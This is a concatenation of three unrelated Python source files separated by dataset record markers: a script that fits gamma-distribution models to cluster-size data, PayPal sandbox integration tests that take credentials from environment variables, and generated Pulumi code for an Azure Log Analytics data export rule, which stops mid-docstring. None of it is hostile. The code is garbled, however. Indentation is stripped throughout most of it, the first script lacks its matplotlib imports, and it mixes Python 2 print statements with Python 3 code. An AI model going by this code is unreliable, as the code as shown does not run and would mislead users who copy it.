import matplotlib.cm as cm
from matplotlib.backends.backend_pdf import PdfPages
from mpl_toolkits.mplot3d.axes3d import Axes3D
import numpy as np
from scipy.optimize import curve_fit
from scipy.stats import gamma
import time
import set_data_path
def load_data(_path):
data = np.load(_path)
beta = data['beta']
num_of_strings = data['num_of_strings']
frames = data['frames']
Ls = data['Ls'].astype(float)  # np.float is removed in modern NumPy
# Ls = (3 * Ls * (Ls + 1) + 1)
size_dist = data['size_dist']
# print size_dist.shape
# M = np.array([np.sum(l) - len(l) for l in size_dist])
M = np.array([np.sum(l) for l in size_dist])
M_ave = M / np.sum(M)
return {
'beta': beta,
'num_of_strings': num_of_strings,
'frames': frames,
'Ls': Ls,
'M_ave': M_ave
}
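def _make_dummy_data(path='dummy_result.npz'):
    # Hedged helper (not part of the original pipeline; name and values are
    # placeholders): writes an .npz file carrying exactly the fields that
    # load_data() reads, so the fitting routines below can be smoke-tested
    # without real simulation output.
    Ls = np.arange(5, 65, 5)
    size_dist = np.ones((len(Ls), 8))  # one fake size histogram per cutting size
    np.savez(path, beta=2.0, num_of_strings=30, frames=1000,
             Ls=Ls, size_dist=size_dist)
    return path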
def show_plot1(ax, num_of_strings):
ax.legend(loc='best')
ax.set_ylim((0., ax.get_ylim()[1]))
ax.set_title('Strings in hexagonal region' +
' (sample: {})'.format(num_of_strings))
ax.set_xlabel(r'Cutting size $L$')
ax.set_ylabel('Average number of the sub-clusters (normalized)')
def fit_a_x0_scale(path):
betas = []
a = []
loc = []
scale = []
fig, ax = plt.subplots()
for i, result_data_path in enumerate(path):
globals().update(load_data(result_data_path))  # quick-and-dirty: injects beta, num_of_strings, frames, Ls, M_ave into module scope
ax.plot(Ls, M_ave, '.', label=r'$\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
popt = curve_fit(gamma.pdf, xdata=Ls, ydata=M_ave, p0=[2.5, -5., 10.])[0]
print(beta, popt)
betas.append(beta)
a.append(popt[0])
loc.append(popt[1])
scale.append(popt[2])
x = np.linspace(0, max(Ls), num=5*max(Ls))
ax.plot(x, gamma.pdf(x, a=popt[0], loc=popt[1], scale=popt[2]),
'-', label=r'fitted $\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
show_plot1(ax, num_of_strings)
plt.show()
betas = np.array(betas)
a = np.array(a)
loc = np.array(loc)
scale = np.array(scale)
fig, (ax1, ax2, ax3) = plt.subplots(3, 1)
ax1.plot(betas, a, 'o')
[ax.set_xlabel(r'$\beta$') for ax in [ax1, ax2, ax3]]
[ax.set_xlim((0, max(betas))) for ax in [ax1, ax2, ax3]]
ax1.set_ylabel(r'Shape parameter: $a$')
ax2.plot(betas, loc, 'o')
ax2.set_ylabel(r'Translation parameter: $x_{0}$')
# ax3.plot(-betas, -scale)  # experimental
ax3.plot(betas, scale, 'o')
ax3.set_ylabel(r'Scale parameter: $\theta$')
plt.show()
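def _demo_gamma_fit():
    # Minimal sketch (helper name hypothetical) of the fit performed above,
    # on noiseless synthetic data: curve_fit treats gamma.pdf(x, a, loc, scale)
    # as a three-parameter model, exactly as fit_a_x0_scale() does.
    x = np.linspace(0.5, 60., 200)
    y = gamma.pdf(x, a=2.5, loc=-5., scale=10.)
    popt = curve_fit(gamma.pdf, xdata=x, ydata=y, p0=[2., -3., 8.])[0]
    print('recovered (a, x0, theta):', popt)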
def fit_a_scale(path, fixed_loc):
def modified_gamma(x, a, scale):
# loc = c * a + d
loc = fixed_loc
return gamma.pdf(x, a=a, loc=loc, scale=scale)
betas = []
a = []
scale = []
fig, ax = plt.subplots()
for i, result_data_path in enumerate(path):
globals().update(load_data(result_data_path))
ax.plot(Ls, M_ave, '.', label=r'$\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
popt = curve_fit(modified_gamma, xdata=Ls, ydata=M_ave, p0=[2.5, 10.])[0]
print(beta, popt)
betas.append(beta)
a.append(popt[0])
scale.append(popt[1])
x = np.linspace(0, max(Ls), num=5*max(Ls))
ax.plot(x, modified_gamma(x, a=popt[0], scale=popt[1]),
'-', label=r'fitted $\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
show_plot1(ax, num_of_strings)
plt.show()
betas = np.array(betas)
a = np.array(a)
scale = np.array(scale)
fig, (ax1, ax2) = plt.subplots(2, 1)
ax1.set_title(r'Fitting parameter (fixed: $x_{0} = 0$)')
ax1.plot(betas, a, 'o')
[ax.set_xlabel(r'$\beta$') for ax in [ax1, ax2]]
[ax.set_xlim((0, max(betas))) for ax in [ax1, ax2]]
ax1.set_ylabel(r'Shape parameter: $a$')
ax2.plot(betas, scale, 'o')
ax2.set_ylabel(r'Scale parameter: $\theta$')
plt.show()
def fit_scale(path, fixed_a, fixed_loc, save_image=False):
matplotlib.rcParams['savefig.dpi'] = 300
def modified_gamma_2(x, scale):
a = fixed_a
loc = fixed_loc
return gamma.pdf(x, a=a, loc=loc, scale=scale)
betas = []
scale = []
fig, ax = plt.subplots()
for i, result_data_path in enumerate(path):
globals().update(load_data(result_data_path))
ax.plot(Ls, M_ave, '.', label=r'$\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
popt = curve_fit(modified_gamma_2, xdata=Ls, ydata=M_ave, p0=[10.])[0]
# print(beta, popt)
betas.append(beta)
scale.append(popt[0])
x = np.linspace(0, max(Ls), num=5*max(Ls))
ax.plot(x, modified_gamma_2(x, scale=popt[0]),
'-',
# label=r'fitted $\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
## critical point
# critical_point = 2. * popt[0] # x = (a - 1) * scale
# ax.plot([critical_point] * 2, [0., 0.05], '-',
# color=cm.viridis(float(i) / len(path)))
show_plot1(ax, num_of_strings)
if save_image:
result_image_path = "../results/img/diecutting/fitted_gamma_fixed_a_x0"
result_image_path += "_" + time.strftime("%y%m%d_%H%M%S")
pdf = PdfPages(result_image_path + ".pdf")
plt.savefig(result_image_path + ".png")
pdf.savefig()
pdf.close()
plt.close()
print "[saved] " + result_image_path
else:
plt.show()
plt.close()
betas = np.array(betas)
scale = np.array(scale)
# beta_theta = lambda x, a, b: a*x + b
beta_theta = lambda x, a, b: a*np.log(x) + b
fig, ax = plt.subplots()
ax.set_title(r'Fitting parameter')
ax.plot(betas, scale, 'o')
popt = curve_fit(beta_theta, xdata=betas, ydata=scale, p0=[15., 0.])[0]
x = np.linspace(min(betas), max(betas))
# ax.plot(x, beta_theta(x, popt[0], popt[1]), '-', color='k',
# label=r'$\theta = {} \beta + {}$'.format(*popt),
# )
ax.plot(x, beta_theta(x, popt[0], popt[1]), '-', color='k',
label=r'$\theta = {} \log \beta + {}$'.format(*popt),
)
ax.legend(loc='best')
ax.set_xlim((0, max(betas)))
ax.set_ylim((0, ax.get_ylim()[1]))
ax.set_xlabel(r'$\beta$')
ax.set_ylabel(r'Scale parameter: $\theta$')
if save_image:
result_image_path = "../results/img/diecutting/fitted_parameters_fixed_a_x0"
result_image_path += "_" + time.strftime("%y%m%d_%H%M%S")
pdf = PdfPages(result_image_path + ".pdf")
plt.savefig(result_image_path + ".png")
pdf.savefig()
pdf.close()
plt.close()
print "[saved] " + result_image_path
else:
plt.show()
plt.close()
plt.show()
def fit_fermi(path, save_image=False):
matplotlib.rcParams['savefig.dpi'] = 300
def fitting_func(x, theta):
return 0.5 * ((x ** 2.) / ((theta ** 3.) * (np.exp(x / theta) - 1.)))
betas = []
scale = []
fig, ax = plt.subplots()
for i, result_data_path in enumerate(path):
globals().update(load_data(result_data_path))
ax.plot(Ls, M_ave, '.', label=r'$\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
popt = curve_fit(fitting_func, xdata=Ls, ydata=M_ave, p0=[10.,])[0]
# print(beta, popt)
betas.append(beta)
scale.append(popt[0])
x = np.linspace(0, max(Ls), num=5*max(Ls))
ax.plot(x, fitting_func(x, theta=popt[0]),
'-',
# label=r'fitted $\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
## critical point
# critical_point = 2. * popt[0] # x = (a - 1) * scale
# ax.plot([critical_point] * 2, [0., 0.05], '-',
# color=cm.viridis(float(i) / len(path)))
show_plot1(ax, num_of_strings)
if save_image:
result_image_path = "../results/img/diecutting/fitted_gamma_fixed_a_x0"
result_image_path += "_" + time.strftime("%y%m%d_%H%M%S")
pdf = PdfPages(result_image_path + ".pdf")
plt.savefig(result_image_path + ".png")
pdf.savefig()
pdf.close()
plt.close()
print "[saved] " + result_image_path
else:
plt.show()
plt.close()
betas = np.array(betas)
scale = np.array(scale)
fig, ax = plt.subplots()
ax.set_title(r'Fitting parameter')
ax.plot(betas, scale, 'o')
ax.set_xlabel(r'$\beta$')
ax.set_xlim((0, max(betas)))
ax.set_ylabel(r'$\theta$')
if save_image:
result_image_path = "../results/img/diecutting/fitted_parameters_fixed_a_x0"
result_image_path += "_" + time.strftime("%y%m%d_%H%M%S")
pdf = PdfPages(result_image_path + ".pdf")
plt.savefig(result_image_path + ".png")
pdf.savefig()
pdf.close()
plt.close()
print "[saved] " + result_image_path
else:
plt.show()
plt.close()
plt.show()
def fermi(path, fixed_a, fixed_loc, save_image=False):
matplotlib.rcParams['savefig.dpi'] = 300
def modified_gamma_2(x, scale):
a = fixed_a
loc = fixed_loc
return gamma.pdf(x, a=a, loc=loc, scale=scale)
betas = []
scale = []
L = []
S = []
fig, ax = plt.subplots()
for i, result_data_path in enumerate(path):
globals().update(load_data(result_data_path))
L.append(Ls)
S.append(M_ave)
popt = curve_fit(modified_gamma_2, xdata=Ls, ydata=M_ave, p0=[10.])[0]
# print(beta, popt)
betas.append(beta)
theta = popt[0]
scale.append(theta)
ax.plot(Ls / theta, M_ave * theta, '.', label=r'$\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
show_plot1(ax, num_of_strings)
ax.set_title(r'Collapsed data')
ax.set_xlabel(r'$L / \theta$')
ax.set_ylabel(r'$\theta * f(L)$')
plt.show()
# if save_image:
# result_image_path = "../results/img/diecutting/fitted_gamma_fixed_a_x0"
# result_image_path += "_" + time.strftime("%y%m%d_%H%M%S")
# pdf = PdfPages(result_image_path + ".pdf")
# plt.savefig(result_image_path + ".png")
# pdf.savefig()
# pdf.close()
# plt.close()
# print "[saved] " + result_image_path
# else:
# plt.show()
# plt.close()
# betas = np.array(betas)
# scale = np.array(scale)
# beta_theta = lambda x, a, b: a*x + b
# # beta_theta = lambda x, a, b: a*np.log(x) + b
# # fig, ax = plt.subplots()
# # ax.set_title(r'Fitting parameter')
# # ax.plot(betas, scale, 'o')
# popt = curve_fit(beta_theta, xdata=betas, ydata=scale, p0=[15., 0.])[0]
# # x = np.linspace(min(betas), max(betas))
# # ax.plot(x, beta_theta(x, popt[0], popt[1]), '-', color='k',
# # label=r'$\theta = {} \beta + {}$'.format(*popt),
# # )
# # ax.plot(x, beta_theta(x, popt[0], popt[1]), '-', color='k',
# # label=r'$\theta = {} \log \beta + {}$'.format(*popt),
# # )
# another_fitted_theta = beta_theta(betas, popt[0], popt[1])
# ## One more time:
# ## But this time, use fitted (splined) theta.
# fig, ax = plt.subplots()
# for i, result_data_path in enumerate(path):
# globals().update(load_data(result_data_path))
# theta = another_fitted_theta[i]
# ax.plot(Ls / theta, M_ave * theta, '.', label=r'$\beta = %2.2f$' % beta,
# color=cm.viridis(float(i) / len(path)))
# show_plot1(ax, num_of_strings)
# ax.set_title(r'Collapsed data (another fitted theta)')
# ax.set_xlabel(r'$L / \theta$')
# ax.set_ylabel(r'$\theta * f(L)$')
# plt.show()
# ax.legend(loc='best')
# ax.set_xlim((0, max(betas)))
# ax.set_ylim((0, ax.get_ylim()[1]))
# ax.set_xlabel(r'$\beta$')
# ax.set_ylabel(r'Scale parameter: $\theta$')
# if save_image:
# result_image_path = "../results/img/diecutting/fitted_parameters_fixed_a_x0"
# result_image_path += "_" + time.strftime("%y%m%d_%H%M%S")
# pdf = PdfPages(result_image_path + ".pdf")
# plt.savefig(result_image_path + ".png")
# pdf.savefig()
# pdf.close()
# plt.close()
# print "[saved] " + result_image_path
# else:
# plt.show()
# plt.close()
# plt.show()
def no_fit(path, fixed_a, fixed_loc, _a, _b, save_image=False):
matplotlib.rcParams['savefig.dpi'] = 300
def modified_gamma_3(x, beta):
a = fixed_a
loc = fixed_loc
# scale = _a * beta + _b
scale = _a * np.log(beta) + _b
return gamma.pdf(x, a=a, loc=loc, scale=scale)
betas = []
scale = []
fig, ax = plt.subplots()
for i, result_data_path in enumerate(path):
globals().update(load_data(result_data_path))
ax.plot(Ls, M_ave, '.', label=r'$\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
betas.append(beta)
x = np.linspace(0, max(Ls), num=5*max(Ls))
ax.plot(x, modified_gamma_3(x, beta),
'-',
# label=r'fitted $\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
show_plot1(ax, num_of_strings)
if save_image:
result_image_path = "../results/img/diecutting/fitted_gamma_fixed_a_x0"
result_image_path += "_" + time.strftime("%y%m%d_%H%M%S")
pdf = PdfPages(result_image_path + ".pdf")
plt.savefig(result_image_path + ".png")
pdf.savefig()
pdf.close()
plt.close()
print "[saved] " + result_image_path
else:
plt.show()
plt.close()
if __name__ == '__main__':
# fit_a_x0_scale(set_data_path.data_path)
# fit_a_scale(set_data_path.data_path, fixed_loc=0.)
# fit_scale(set_data_path.data_path, fixed_a=3., fixed_loc=0., save_image=False)
# fit_fermi(set_data_path.data_path, save_image=False)
# # no_fit(set_data_path.data_path, fixed_a=3., fixed_loc=0., _a=3.6, _b=0., save_image=False)
# no_fit(set_data_path.data_path, fixed_a=3., fixed_loc=0., _a=19., _b=-8., save_image=False)
fermi(set_data_path.data_path, fixed_a=3., fixed_loc=0., save_image=False)
[record boundary — remaining per-file quality-signal columns omitted]
[next record: test/http_test.py — repo ivcuello/pypaypal, blob 8a4834d7767ec22aaa39441e6cc7545e731ecc6b, head 957cbd4e8d2127b0fc639825ce3a3924acd3216d, Python, 6,311 bytes, Apache-2.0, 1 star (2022-01-18), 10 issues (2021-01-31)]
"""Integration Test module for main http module
it's required to provide client & secret
ENV variables for this tests executions
"""
import os
import unittest
from pypaypal.errors import IdentityError, ExpiredSessionError
from pypaypal.http import (
AuthType,
parse_url,
SessionMode,
PayPalSession,
SessionStatus,
authenticate,
session_from_token
)
_MODE = SessionMode.SANDBOX
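# These integration tests read sandbox credentials from the environment:
#   export TEST_PP_CLIENT=<client id>       (read in each setUp below)
#   export TEST_PP_SECRET=<client secret>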
def test_disposability(session: PayPalSession):
try:
with session:
pass
session.get('https://api.sandbox.paypal.com/v2/payments/authorizations/6W688518YP6703149')
raise AssertionError('This must be unreachable')
except ExpiredSessionError:
print('Expired session test OK!!')
class TestOAuthSession(unittest.TestCase):
"""Test class for OAuthSession implementation
"""
def setUp(self):
self.auth_type = AuthType.TOKEN
self.client = os.environ['TEST_PP_CLIENT']
self.secret = os.environ['TEST_PP_SECRET']
self.auth_session = authenticate(self.client, self.secret, _MODE, self.auth_type)
def tearDown(self):
self.client = None
self.secret = None
self.auth_session = None
def test_invalid_authentication(self):
try:
authenticate(self.client, 'invalid-secret', _MODE, self.auth_type)
raise AssertionError('An IdentityError was expected.')
except IdentityError:
print('IdentityError test OK!!')
def test_authentication(self):
auth_session = authenticate(self.client, self.secret, _MODE, self.auth_type)
self.assertEqual(auth_session.status, SessionStatus.ACTIVE)
def test_session_from_token(self):
token_session = session_from_token(self.auth_session._paypal_token, _MODE)
self.assertEqual(token_session.status, SessionStatus.ACTIVE)
def test_disposability(self):
disposable_session = session_from_token(self.auth_session._paypal_token, _MODE)
self.assertEqual(disposable_session.status, SessionStatus.ACTIVE)
test_disposability(disposable_session)
self.assertEqual(disposable_session.status, SessionStatus.DISPOSED)
def test_session_expiration(self):
pass
def test_post(self):
pass
def test_get(self):
pass
def test_put(self):
pass
def test_patch(self):
pass
def test_delete(self):
pass
class TestBasicSession(unittest.TestCase):
"""Test class for BasicSession implementation
"""
def setUp(self):
self.auth_type = AuthType.BASIC
self.client = os.environ['TEST_PP_CLIENT']
self.secret = os.environ['TEST_PP_SECRET']
self.auth_session = authenticate(self.client, self.secret, _MODE, self.auth_type)
def tearDown(self):
self.client = None
self.secret = None
self.auth_session = None
def test_invalid_authentication(self):
try:
authenticate(self.client, 'invalid-secret', _MODE, self.auth_type)
raise AssertionError('An IdentityError was expected.')
except IdentityError:
print('IdentityError test OK!!')
def test_authentication(self):
auth_session = authenticate(self.client, self.secret, _MODE, self.auth_type)
self.assertEqual(auth_session.status, SessionStatus.ACTIVE)
def test_session_from_token(self):
token_session = session_from_token(self.auth_session._paypal_token, _MODE)
self.assertEqual(token_session.status, SessionStatus.ACTIVE)
def test_disposability(self):
disposable_session = session_from_token(self.auth_session._paypal_token, _MODE)
self.assertEqual(disposable_session.status, SessionStatus.ACTIVE)
test_disposability(disposable_session)
self.assertEqual(disposable_session.status, SessionStatus.DISPOSED)
def test_session_expiration(self):
pass
def test_post(self):
pass
def test_get(self):
pass
def test_put(self):
pass
def test_patch(self):
pass
def test_delete(self):
pass
class TestRefreshableSession(unittest.TestCase):
"""Test class for RefreshableSession implementation
"""
def setUp(self):
self.auth_type = AuthType.REFRESHABLE
self.client = os.environ['TEST_PP_CLIENT']
self.secret = os.environ['TEST_PP_SECRET']
self.auth_session = authenticate(self.client, self.secret, _MODE, self.auth_type)
def tearDown(self):
self.client = None
self.secret = None
self.auth_session = None
def test_invalid_authentication(self):
try:
authenticate(self.client, 'invalid-secret', _MODE, self.auth_type)
raise AssertionError('An IdentityError was expected.')
except IdentityError:
print('IdentityError test OK!!')
def test_authentication(self):
auth_session = authenticate(self.client, self.secret, _MODE, self.auth_type)
self.assertEqual(auth_session.status, SessionStatus.ACTIVE)
def test_session_from_token(self):
token_session = session_from_token(self.auth_session._paypal_token, _MODE)
self.assertEqual(token_session.status, SessionStatus.ACTIVE)
def test_disposability(self):
disposable_session = session_from_token(self.auth_session._paypal_token, _MODE)
self.assertEqual(disposable_session.status, SessionStatus.ACTIVE)
test_disposability(disposable_session)
self.assertEqual(disposable_session.status, SessionStatus.DISPOSED)
def test_session_expiration(self):
pass
def test_post(self):
pass
def test_get(self):
pass
def test_put(self):
pass
def test_patch(self):
pass
def test_delete(self):
pass
class TestModuleMethods(unittest.TestCase):
def test_parse_url(self):
"""url parsing function test
"""
expected = 'https://api.sandbox.paypal.com/v2/billing/subscriptions'
actual = parse_url('https://api.sandbox.paypal.com/v2', 'billing', '/subscriptions')
self.assertEqual(expected, actual)
if __name__ == '__main__':
unittest.main()
[record boundary — remaining per-file quality-signal columns omitted]
[next record: sdk/python/pulumi_azure/loganalytics/data_export_rule.py — repo henriktao/pulumi-azure, blob 8a605f7632ae15091c238f192b6d156d14233923, head f1cbcf100b42b916da36d8fe28be3a159abaf022, Python, 24,640 bytes, ECL-2.0 / Apache-2.0, 109 stars (2018-06-18 – 2022-02-20), 663 issues (2018-06-18 – 2022-03-31), 41 forks (2018-07-19 – 2022-03-14)]
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['DataExportRuleArgs', 'DataExportRule']
@pulumi.input_type
class DataExportRuleArgs:
def __init__(__self__, *,
destination_resource_id: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
table_names: pulumi.Input[Sequence[pulumi.Input[str]]],
workspace_resource_id: pulumi.Input[str],
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DataExportRule resource.
:param pulumi.Input[str] destination_resource_id: The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] table_names: A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`.
:param pulumi.Input[str] workspace_resource_id: The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[bool] enabled: Is this Log Analytics Data Export Rule enabled? Possible values include `true` or `false`. Defaults to `false`.
:param pulumi.Input[str] name: The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
pulumi.set(__self__, "destination_resource_id", destination_resource_id)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "table_names", table_names)
pulumi.set(__self__, "workspace_resource_id", workspace_resource_id)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="destinationResourceId")
def destination_resource_id(self) -> pulumi.Input[str]:
"""
The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically.
"""
return pulumi.get(self, "destination_resource_id")
@destination_resource_id.setter
def destination_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "destination_resource_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="tableNames")
def table_names(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`.
"""
return pulumi.get(self, "table_names")
@table_names.setter
def table_names(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "table_names", value)
@property
@pulumi.getter(name="workspaceResourceId")
def workspace_resource_id(self) -> pulumi.Input[str]:
"""
The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "workspace_resource_id")
@workspace_resource_id.setter
def workspace_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "workspace_resource_id", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is this Log Analytics Data Export Rule enabled? Possible values include `true` or `false`. Defaults to `false`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _DataExportRuleState:
def __init__(__self__, *,
destination_resource_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
export_rule_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
table_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
workspace_resource_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering DataExportRule resources.
:param pulumi.Input[str] destination_resource_id: The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically.
:param pulumi.Input[bool] enabled: Is this Log Analytics Data Export Rule enabled? Possible values include `true` or `false`. Defaults to `false`.
:param pulumi.Input[str] export_rule_id: The ID of the created Data Export Rule.
:param pulumi.Input[str] name: The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] table_names: A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`.
:param pulumi.Input[str] workspace_resource_id: The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
if destination_resource_id is not None:
pulumi.set(__self__, "destination_resource_id", destination_resource_id)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if export_rule_id is not None:
pulumi.set(__self__, "export_rule_id", export_rule_id)
if name is not None:
pulumi.set(__self__, "name", name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if table_names is not None:
pulumi.set(__self__, "table_names", table_names)
if workspace_resource_id is not None:
pulumi.set(__self__, "workspace_resource_id", workspace_resource_id)
@property
@pulumi.getter(name="destinationResourceId")
def destination_resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically.
"""
return pulumi.get(self, "destination_resource_id")
@destination_resource_id.setter
def destination_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "destination_resource_id", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is this Log Analytics Data Export Rule enabled? Possible values include `true` or `false`. Defaults to `false`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="exportRuleId")
def export_rule_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the created Data Export Rule.
"""
return pulumi.get(self, "export_rule_id")
@export_rule_id.setter
def export_rule_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "export_rule_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="tableNames")
def table_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`.
"""
return pulumi.get(self, "table_names")
@table_names.setter
def table_names(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "table_names", value)
@property
@pulumi.getter(name="workspaceResourceId")
def workspace_resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "workspace_resource_id")
@workspace_resource_id.setter
def workspace_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "workspace_resource_id", value)
class DataExportRule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
destination_resource_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
table_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
workspace_resource_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Log Analytics Data Export Rule.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_analytics_workspace = azure.operationalinsights.AnalyticsWorkspace("exampleAnalyticsWorkspace",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="PerGB2018",
retention_in_days=30)
example_account = azure.storage.Account("exampleAccount",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
account_tier="Standard",
account_replication_type="LRS")
example_data_export_rule = azure.loganalytics.DataExportRule("exampleDataExportRule",
resource_group_name=example_resource_group.name,
workspace_resource_id=example_analytics_workspace.id,
destination_resource_id=example_account.id,
table_names=["Heartbeat"],
enabled=True)
```
## Import
Log Analytics Data Export Rule can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:loganalytics/dataExportRule:DataExportRule example /subscriptions/00000000-0000-0000-0000-000000000000/resourcegroups/group1/providers/Microsoft.OperationalInsights/workspaces/workspace1/dataExports/dataExport1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] destination_resource_id: The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically.
:param pulumi.Input[bool] enabled: Is this Log Analytics Data Export Rule enabled? Possible values include `true` or `false`. Defaults to `false`.
:param pulumi.Input[str] name: The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] table_names: A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`.
:param pulumi.Input[str] workspace_resource_id: The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DataExportRuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Log Analytics Data Export Rule.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
